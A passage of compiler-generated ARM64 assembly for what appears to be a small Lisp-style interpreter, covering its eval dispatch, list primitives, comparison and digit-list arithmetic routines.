#-200] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #176] ; 8-byte Folded Spill b LBB18_28 LBB18_27: ldur x8, [x29, #-208] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #176] ; 8-byte Folded Spill b LBB18_28 LBB18_28: ldr x8, [sp, #176] ; 8-byte Folded Reload stur x8, [x29, #-24] b LBB18_96 LBB18_29: ldr x8, [sp, #208] ; 8-byte Folded Reload ldur x9, [x29, #-192] ; 8-byte Folded Reload ldr x9, [x9] ldr x8, [x8, x9, lsl #3] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB18_31 b LBB18_30 LBB18_30: ldur x1, [x29, #-72] adrp x0, l_.str.26@PAGE add x0, x0, l_.str.26@PAGEOFF bl _out stur x0, [x29, #-24] b LBB18_96 LBB18_31: ldr x8, [sp, #208] ; 8-byte Folded Reload ldur x9, [x29, #-184] ; 8-byte Folded Reload ldr x9, [x9] ldr x9, [x8, x9, lsl #3] stur x9, [x29, #-120] ldur x9, [x29, #-120] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-128] ldur x0, [x29, #-72] mov x1, #0 bl _cons ldr x10, [sp, #216] ; 8-byte Folded Reload ldr x9, [sp, #208] ; 8-byte Folded Reload stur x0, [x29, #-136] ldur x8, [x29, #-136] ldur x11, [x29, #-128] str x8, [x10, x11, lsl #3] ldur x8, [x29, #-136] ldur x10, [x29, #-120] str x8, [x9, x10, lsl #3] ldur x8, [x29, #-72] stur x8, [x29, #-24] b LBB18_96 LBB18_32: ldur x1, [x29, #-72] adrp x0, l_.str.27@PAGE add x0, x0, l_.str.27@PAGEOFF bl _out stur x0, [x29, #-24] b LBB18_96 LBB18_33: ldr x8, [sp, #200] ; 8-byte Folded Reload ldur x9, [x29, #-72] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB18_35 b LBB18_34 LBB18_34: mov x8, #0 str x8, [sp, #168] ; 8-byte Folded Spill b LBB18_36 LBB18_35: ldur x8, [x29, #-72] str x8, [sp, #168] ; 8-byte Folded Spill b LBB18_36 LBB18_36: ldr x8, [sp, #200] ; 8-byte Folded Reload ldr x9, [sp, #168] ; 8-byte Folded Reload str x9, [sp, #160] ; 8-byte Folded Spill ldur x9, [x29, #-80] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB18_38 b LBB18_37 LBB18_37: mov x8, #0 str x8, [sp, #152] ; 8-byte Folded Spill b LBB18_39 LBB18_38: ldur x8, [x29, #-80] str x8, [sp, #152] ; 8-byte Folded Spill b LBB18_39 LBB18_39: ldr x0, [sp, #160] ; 8-byte Folded Reload ldr x1, [sp, #152] ; 8-byte Folded Reload bl _append stur x0, [x29, #-24] b LBB18_96 LBB18_40: ldur x0, [x29, #-72] bl _length bl _mk_numb stur x0, [x29, #-24] b LBB18_96 LBB18_41: ldur x0, [x29, #-72] bl _nmb str x0, [sp, #144] ; 8-byte Folded Spill ldur x0, [x29, #-80] bl _nmb mov x1, x0 ldr x0, [sp, #144] ; 8-byte Folded Reload bl _compare subs x8, x0, #60 cset w8, ne tbnz w8, #0, LBB18_43 b LBB18_42 LBB18_42: ldur x8, [x29, #-200] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #136] ; 8-byte Folded Spill b LBB18_44 LBB18_43: ldur x8, [x29, #-208] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #136] ; 8-byte Folded Spill b LBB18_44 LBB18_44: ldr x8, [sp, #136] ; 8-byte Folded Reload stur x8, [x29, #-24] b LBB18_96 LBB18_45: ldur x0, [x29, #-72] bl _nmb str x0, [sp, #128] ; 8-byte Folded Spill ldur x0, [x29, #-80] bl _nmb mov x1, x0 ldr x0, [sp, #128] ; 8-byte Folded Reload bl _compare subs x8, x0, #62 cset w8, ne tbnz w8, #0, LBB18_47 b LBB18_46 LBB18_46: ldur x8, [x29, #-200] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #120] ; 8-byte Folded Spill b LBB18_48 LBB18_47: ldur x8, [x29, #-208] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #120] ; 8-byte Folded Spill b LBB18_48 LBB18_48: ldr x8, [sp, #120] ; 8-byte Folded Reload stur x8, [x29, #-24] b LBB18_96 LBB18_49: ldur x0, [x29, #-72] bl _nmb str x0, [sp, #112] ; 8-byte Folded Spill ldur x0, [x29, #-80] bl _nmb mov x1, x0 ldr x0, [sp, #112] ; 8-byte Folded Reload bl _compare subs x8, x0, #62 cset w8, eq tbnz w8, #0, LBB18_51 b LBB18_50 LBB18_50: ldur x8, [x29, #-200] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #104] ; 8-byte Folded Spill b LBB18_52 LBB18_51: ldur x8, [x29, #-208] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #104] ; 8-byte Folded Spill b LBB18_52 LBB18_52: ldr x8, [sp, #104] ; 8-byte Folded Reload stur x8, [x29, #-24] b LBB18_96 LBB18_53: ldur x0, [x29, #-72] bl _nmb str x0, [sp, #96] ; 8-byte Folded Spill ldur x0, [x29, #-80] bl _nmb mov x1, x0 ldr x0, [sp, #96] ; 8-byte Folded Reload bl _compare subs x8, x0, #60 cset w8, eq tbnz w8, #0, LBB18_55 b LBB18_54 LBB18_54: ldur x8, [x29, #-200] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #88] ; 8-byte Folded Spill b LBB18_56 LBB18_55: ldur x8, [x29, #-208] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #88] ; 8-byte Folded Spill b LBB18_56 LBB18_56: ldr x8, [sp, #88] ; 8-byte Folded Reload stur x8, [x29, #-24] b LBB18_96 LBB18_57: ldur x0, [x29, #-72] bl _nmb str x0, [sp, #80] ; 8-byte Folded Spill ldur x0, [x29, #-80] bl _nmb mov x1, x0 ldr x0, [sp, #80] ; 8-byte Folded Reload mov x2, #0 bl _addition bl _mk_numb stur x0, [x29, #-24] b LBB18_96 LBB18_58: ldur x0, [x29, #-72] bl _nmb str x0, [sp, #72] ; 8-byte Folded Spill ldur x0, [x29, #-80] bl _nmb mov x1, x0 ldr x0, [sp, #72] ; 8-byte Folded Reload bl _multiplication bl _mk_numb stur x0, [x29, #-24] b LBB18_96 LBB18_59: ldur x0, [x29, #-72] bl _nmb str x0, [sp, #64] ; 8-byte Folded Spill ldur x0, [x29, #-80] bl _nmb mov x1, x0 ldr x0, [sp, #64] ; 8-byte Folded Reload bl _exponentiation bl _mk_numb stur x0, [x29, #-24] b LBB18_96 LBB18_60: ldur x0, [x29, #-72] bl _nmb str x0, [sp, #56] ; 8-byte Folded Spill ldur x0, [x29, #-80] bl _nmb mov x1, x0 ldr x0, [sp, #56] ; 8-byte Folded Reload bl _compare subs x8, x0, #62 cset w8, eq tbnz w8, #0, LBB18_62 b LBB18_61 LBB18_61: mov x0, #0 bl _mk_numb stur x0, [x29, #-24] b LBB18_96 LBB18_62: ldur x0, [x29, #-72] bl _nmb str x0, [sp, #48] ; 8-byte Folded Spill ldur x0, [x29, #-80] bl _nmb mov x1, x0 ldr x0, [sp, #48] ; 8-byte Folded Reload mov x2, #0 bl _subtraction bl _remove_leading_zeros bl _mk_numb stur x0, [x29, #-24] b LBB18_96 LBB18_63: ldur x0, [x29, #-72] bl _base2_to_10 bl _mk_numb stur x0, [x29, #-24] b LBB18_96 LBB18_64: ldur x0, [x29, #-72] bl _nmb bl _base10_to_2 stur x0, [x29, #-24] b LBB18_96 LBB18_65: ldur x0, [x29, #-72] bl _size bl _mk_numb stur x0, [x29, #-24] b LBB18_96 LBB18_66: bl _read_bit stur x0, [x29, #-24] b LBB18_96 LBB18_67: mov x1, #0 mov x0, x1 bl _cons adrp x8, _q@GOTPAGE ldr x8, [x8, _q@GOTPAGEOFF] str x0, [x8] stur x0, [x29, #-56] ldur x0, [x29, #-72] bl _write_lst mov x0, #10 bl _write_chr ldr x8, [sp, #216] ; 8-byte Folded Reload ldur x9, [x29, #-56] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-24] b LBB18_96 LBB18_68: bl _read_record stur x0, [x29, #-56] ldur x8, [x29, #-56] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB18_70 b LBB18_69 LBB18_69: ldur x8, [x29, #-56] stur x8, [x29, #-24] b LBB18_96 LBB18_70: mov x0, #0 bl _read_expr stur x0, [x29, #-24] b LBB18_96 LBB18_71: ldur x9, [x29, #-176] ; 8-byte Folded Reload ldur x8, [x29, #-40] ldr x9, [x9] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB18_75 b LBB18_72 LBB18_72: ldur x8, [x29, #-40] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB18_74 b LBB18_73 LBB18_73: adrp x8, _wrd_out_of_time@GOTPAGE ldr x8, [x8, _wrd_out_of_time@GOTPAGEOFF] ldr x9, [x8] mov x8, #0 subs x8, x8, x9 stur x8, [x29, #-24] b LBB18_96 LBB18_74: ldur x0, [x29, #-40] bl _sub1 stur x0, [x29, #-40] b LBB18_75 LBB18_75: ldur x8, [x29, #-48] adrp x9, _wrd_eval@GOTPAGE ldr x9, [x9, _wrd_eval@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB18_77 b LBB18_76 LBB18_76: bl _clean_env ldur x0, [x29, #-72] ldur x1, [x29, #-40] bl _eval stur x0, [x29, #-56] bl _restore_env ldur x8, [x29, #-56] stur x8, [x29, #-24] b LBB18_96 LBB18_77: ldur x8, [x29, #-48] adrp x9, _wrd_try@GOTPAGE ldr x9, [x9, _wrd_try@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB18_90 b LBB18_78 LBB18_78: ldur x9, [x29, #-176] ; 8-byte Folded Reload stur xzr, [x29, #-152] ldur x8, [x29, #-72] ldr x9, [x9] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB18_80 b LBB18_79 LBB18_79: ldur x0, [x29, #-72] bl _nmb stur x0, [x29, #-72] b LBB18_80 LBB18_80: ldur x9, [x29, #-176] ; 8-byte Folded Reload ldur x8, [x29, #-72] ldr x9, [x9] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB18_83 b LBB18_81 LBB18_81: ldur x9, [x29, #-176] ; 8-byte Folded Reload ldur x8, [x29, #-40] ldr x9, [x9] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB18_84 b LBB18_82 LBB18_82: ldur x0, [x29, #-72] ldur x1, [x29, #-40] bl _compare subs x8, x0, #60 cset w8, eq tbnz w8, #0, LBB18_84 b LBB18_83 LBB18_83: mov x8, #1 stur x8, [x29, #-152] ldur x8, [x29, #-40] stur x8, [x29, #-72] b LBB18_84 LBB18_84: ldur x8, [x29, #-160] ; 8-byte Folded Reload ldur x0, [x29, #-88] ldr x1, [x8] bl _cons ldur x9, [x29, #-160] ; 8-byte Folded Reload ldur x8, [x29, #-192] ; 8-byte Folded Reload str x0, [x9] ldr x1, [x8] mov x0, #0 str x0, [sp, #40] ; 8-byte Folded Spill bl _cons ldr x1, [sp, #40] ; 8-byte Folded Reload ldur x8, [x29, #-192] ; 8-byte Folded Reload str x0, [x8] mov x0, x1 bl _cons ldr x10, [sp, #208] ; 8-byte Folded Reload ldur x8, [x29, #-184] ; 8-byte Folded Reload stur x0, [x29, #-144] ldur x9, [x29, #-144] ldur x11, [x29, #-144] str x9, [x10, x11, lsl #3] ldur x0, [x29, #-144] ldr x1, [x8] bl _cons ldur x8, [x29, #-184] ; 8-byte Folded Reload str x0, [x8] bl _clean_env ldur x0, [x29, #-80] ldur x1, [x29, #-72] bl _eval stur x0, [x29, #-56] bl _restore_env ldur x13, [x29, #-160] ; 8-byte Folded Reload ldur x12, [x29, #-192] ; 8-byte Folded Reload ldr x10, [sp, #208] ; 8-byte Folded Reload ldr x8, [sp, #216] ; 8-byte Folded Reload ldur x9, [x29, #-184] ; 8-byte Folded Reload ldr x11, [x13] ldr x11, [x8, x11, lsl #3] str x11, [x13] ldr x11, [x12] ldr x11, [x8, x11, lsl #3] str x11, [x12] ldr x11, [x9] ldr x10, [x10, x11, lsl #3] ldr x10, [x8, x10, lsl #3] stur x10, [x29, #-144] ldr x10, [x9] ldr x8, [x8, x10, lsl #3] str x8, [x9] ldur x8, [x29, #-152] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB18_87 b LBB18_85 LBB18_85: ldur x8, [x29, #-56] adrp x9, _wrd_out_of_time@GOTPAGE ldr x9, [x9, _wrd_out_of_time@GOTPAGEOFF] ldr x9, [x9] adds x8, x8, x9 cset w8, ne tbnz w8, #0, LBB18_87 b LBB18_86 LBB18_86: ldur x8, [x29, #-56] stur x8, [x29, #-24] b LBB18_96 LBB18_87: ldur x8, [x29, #-56] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB18_89 b LBB18_88 LBB18_88: adrp x8, _wrd_failure@GOTPAGE ldr x8, [x8, _wrd_failure@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #32] ; 8-byte Folded Spill ldur x8, [x29, #-56] mov x1, #0 subs x8, x1, x8 str x8, [sp, #24] ; 8-byte Folded Spill ldur x0, [x29, #-144] bl _cons mov x1, x0 ldr x0, [sp, #24] ; 8-byte Folded Reload bl _cons mov x1, x0 ldr x0, [sp, #32] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-24] b LBB18_96 LBB18_89: adrp x8, _wrd_success@GOTPAGE ldr x8, [x8, _wrd_success@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #16] ; 8-byte Folded Spill ldur x8, [x29, #-56] str x8, [sp, #8] ; 8-byte Folded Spill ldur x0, [x29, #-144] mov x1, #0 bl _cons mov x1, x0 ldr x0, [sp, #8] ; 8-byte Folded Reload bl _cons mov x1, x0 ldr x0, [sp, #16] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-24] b LBB18_96 LBB18_90: ldr x8, [sp, #208] ; 8-byte Folded Reload ldr x9, [sp, #216] ; 8-byte Folded Reload ldur x10, [x29, #-48] ldr x10, [x9, x10, lsl #3] stur x10, [x29, #-48] ldur x10, [x29, #-48] ldr x10, [x8, x10, lsl #3] stur x10, [x29, #-96] ldur x10, [x29, #-48] ldr x9, [x9, x10, lsl #3] stur x9, [x29, #-48] ldur x9, [x29, #-48] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-104] ldur x0, [x29, #-96] ldur x1, [x29, #-64] bl _bind ldur x0, [x29, #-104] ldur x1, [x29, #-40] bl _eval stur x0, [x29, #-56] b LBB18_91 LBB18_91: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #200] ; 8-byte Folded Reload ldur x9, [x29, #-96] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB18_95 b LBB18_92 LBB18_92: ; in Loop: Header=BB18_91 Depth=1 ldr x8, [sp, #200] ; 8-byte Folded Reload ldr x9, [sp, #208] ; 8-byte Folded Reload ldur x10, [x29, #-96] ldr x9, [x9, x10, lsl #3] stur x9, [x29, #-112] ldur x9, [x29, #-112] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB18_94 b LBB18_93 LBB18_93: ; in Loop: Header=BB18_91 Depth=1 ldur x9, [x29, #-168] ; 8-byte Folded Reload ldr x8, [sp, #216] ; 8-byte Folded Reload ldur x10, [x29, #-112] ldr x10, [x9, x10, lsl #3] ldr x8, [x8, x10, lsl #3] ldur x10, [x29, #-112] str x8, [x9, x10, lsl #3] b LBB18_94 LBB18_94: ; in Loop: Header=BB18_91 Depth=1 ldr x8, [sp, #216] ; 8-byte Folded Reload ldur x9, [x29, #-96] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-96] b LBB18_91 LBB18_95: ldur x8, [x29, #-56] stur x8, [x29, #-24] b LBB18_96 LBB18_96: ldur x0, [x29, #-24] ldp x29, x30, [sp, #432] ; 16-byte Folded Reload ldp x28, x27, [sp, #416] ; 16-byte Folded Reload add sp, sp, #448 ret .cfi_endproc .p2align 2 lJTI18_0: .long LBB18_18-Ltmp1 .long LBB18_19-Ltmp1 .long LBB18_20-Ltmp1 .long LBB18_21-Ltmp1 .long LBB18_25-Ltmp1 .long LBB18_29-Ltmp1 .long LBB18_32-Ltmp1 .long LBB18_33-Ltmp1 .long LBB18_40-Ltmp1 .long LBB18_41-Ltmp1 .long LBB18_45-Ltmp1 .long LBB18_49-Ltmp1 .long LBB18_53-Ltmp1 .long LBB18_57-Ltmp1 .long LBB18_58-Ltmp1 .long LBB18_59-Ltmp1 .long LBB18_60-Ltmp1 .long LBB18_63-Ltmp1 .long LBB18_64-Ltmp1 .long LBB18_65-Ltmp1 .long LBB18_66-Ltmp1 .long LBB18_67-Ltmp1 .long LBB18_68-Ltmp1 ; -- End function .globl _evalst ; -- Begin function evalst .p2align 2 _evalst: ; @evalst .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] str x1, [sp, #24] ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB19_2 b LBB19_1 LBB19_1: stur xzr, [x29, #-8] b LBB19_7 LBB19_2: ldur x9, [x29, #-16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] ldr x1, [sp, #24] bl _eval str x0, [sp, #16] ldr x8, [sp, #16] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB19_4 b LBB19_3 LBB19_3: ldr x8, [sp, #16] stur x8, [x29, #-8] b LBB19_7 LBB19_4: ldur x9, [x29, #-16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] ldr x1, [sp, #24] bl _evalst str x0, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB19_6 b LBB19_5 LBB19_5: ldr x8, [sp, #8] stur x8, [x29, #-8] b LBB19_7 LBB19_6: ldr x0, [sp, #16] ldr x1, [sp, #8] bl _cons stur x0, [x29, #-8] b LBB19_7 LBB19_7: ldur x0, [x29, #-8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _eq ; -- Begin function eq .p2align 2 _eq: ; @eq .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _numb@GOTPAGE ldr x8, [x8, _numb@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill str x0, [sp, #16] str x1, [sp, #8] ldr x8, [sp, #16] ldr x9, [sp, #8] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB20_2 b LBB20_1 LBB20_1: mov x8, #1 stur x8, [x29, #-8] b LBB20_14 LBB20_2: ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #16] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB20_5 b LBB20_3 LBB20_3: ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #8] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB20_5 b LBB20_4 LBB20_4: ldr x9, [sp, #16] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] ldr x9, [sp, #8] ldr x1, [x8, x9, lsl #3] bl _eq_wrd stur x0, [x29, #-8] b LBB20_14 LBB20_5: ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #16] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB20_7 b LBB20_6 LBB20_6: ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #8] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB20_8 b LBB20_7 LBB20_7: stur xzr, [x29, #-8] b LBB20_14 LBB20_8: ldr x9, [sp, #16] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB20_10 b LBB20_9 LBB20_9: ldr x9, [sp, #8] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB20_11 b LBB20_10 LBB20_10: stur xzr, [x29, #-8] b LBB20_14 LBB20_11: ldr x9, [sp, #16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] ldr x9, [sp, #8] ldr x1, [x8, x9, lsl #3] bl _eq subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB20_13 b LBB20_12 LBB20_12: ldr x9, [sp, #16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] ldr x9, [sp, #8] ldr x1, [x8, x9, lsl #3] bl _eq stur x0, [x29, #-8] b LBB20_14 LBB20_13: stur xzr, [x29, #-8] b LBB20_14 LBB20_14: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _append ; -- Begin function append .p2align 2 _append: ; @append .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] str x1, [sp, #8] ldr x8, [sp, #16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB21_2 b LBB21_1 LBB21_1: ldr x8, [sp, #8] stur x8, [x29, #-8] b LBB21_3 LBB21_2: ldr x9, [sp, #16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp] ; 8-byte Folded Spill ldr x9, [sp, #16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] ldr x1, [sp, #8] bl _append mov x1, x0 ldr x0, [sp] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-8] b LBB21_3 LBB21_3: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _length ; -- Begin function length .p2align 2 _length: ; @length .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp] ldr x9, [sp] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB22_2 b LBB22_1 LBB22_1: str xzr, [sp, #8] b LBB22_3 LBB22_2: ldr x9, [sp] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _length bl _add1 str x0, [sp, #8] b LBB22_3 LBB22_3: ldr x0, [sp, #8] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _compare ; -- Begin function compare .p2align 2 _compare: ; @compare .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] str x1, [sp, #24] ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB23_3 b LBB23_1 LBB23_1: ldr x8, [sp, #24] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB23_3 b LBB23_2 LBB23_2: mov x8, #61 stur x8, [x29, #-8] b LBB23_17 LBB23_3: ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB23_6 b LBB23_4 LBB23_4: ldr x8, [sp, #24] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB23_6 b LBB23_5 LBB23_5: mov x8, #60 stur x8, [x29, #-8] b LBB23_17 LBB23_6: ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB23_9 b LBB23_7 LBB23_7: ldr x8, [sp, #24] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB23_9 b LBB23_8 LBB23_8: mov x8, #62 stur x8, [x29, #-8] b LBB23_17 LBB23_9: ldur x9, [x29, #-16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] ldr x9, [sp, #24] ldr x1, [x8, x9, lsl #3] bl _compare str x0, [sp, #16] ldr x8, [sp, #16] subs x8, x8, #61 cset w8, eq tbnz w8, #0, LBB23_11 b LBB23_10 LBB23_10: ldr x8, [sp, #16] stur x8, [x29, #-8] b LBB23_17 LBB23_11: ldur x9, [x29, #-16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x9, [x8, x9, lsl #3] str x9, [sp, #8] ldr x9, [sp, #24] ldr x8, [x8, x9, lsl #3] str x8, [sp] ldr x8, [sp, #8] ldr x9, [sp] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB23_13 b LBB23_12 LBB23_12: mov x8, #61 stur x8, [x29, #-8] b LBB23_17 LBB23_13: ldr x8, [sp, #8] ldr x9, [sp] subs x8, x8, x9 cset w8, ge tbnz w8, #0, LBB23_15 b LBB23_14 LBB23_14: mov x8, #60 stur x8, [x29, #-8] b LBB23_17 LBB23_15: ldr x8, [sp, #8] ldr x9, [sp] subs x8, x8, x9 cset w8, le tbnz w8, #0, LBB23_17 b LBB23_16 LBB23_16: mov x8, #62 stur x8, [x29, #-8] b LBB23_17 LBB23_17: ldur x0, [x29, #-8] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _nmb ; -- Begin function nmb .p2align 2 _nmb: ; @nmb .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp] ldr x9, [sp] adrp x8, _numb@GOTPAGE ldr x8, [x8, _numb@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB24_2 b LBB24_1 LBB24_1: ldr x9, [sp] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #8] b LBB24_3 LBB24_2: str xzr, [sp, #8] b LBB24_3 LBB24_3: ldr x0, [sp, #8] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _addition ; -- Begin function addition .p2align 2 _addition: ; @addition .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] stur x1, [x29, #-24] stur x2, [x29, #-32] ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB25_3 b LBB25_1 LBB25_1: ldur x8, [x29, #-32] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB25_3 b LBB25_2 LBB25_2: ldur x8, [x29, #-24] stur x8, [x29, #-8] b LBB25_15 LBB25_3: ldur x8, [x29, #-24] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB25_6 b LBB25_4 LBB25_4: ldur x8, [x29, #-32] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB25_6 b LBB25_5 LBB25_5: ldur x8, [x29, #-16] stur x8, [x29, #-8] b LBB25_15 LBB25_6: ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB25_8 b LBB25_7 LBB25_7: ldur x9, [x29, #-16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #48] ldur x9, [x29, #-16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #32] b LBB25_9 LBB25_8: mov x8, #48 str x8, [sp, #48] str xzr, [sp, #32] b LBB25_9 LBB25_9: ldur x8, [x29, #-24] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB25_11 b LBB25_10 LBB25_10: ldur x9, [x29, #-24] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #40] ldur x9, [x29, #-24] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #24] b LBB25_12 LBB25_11: mov x8, #48 str x8, [sp, #40] str xzr, [sp, #24] b LBB25_12 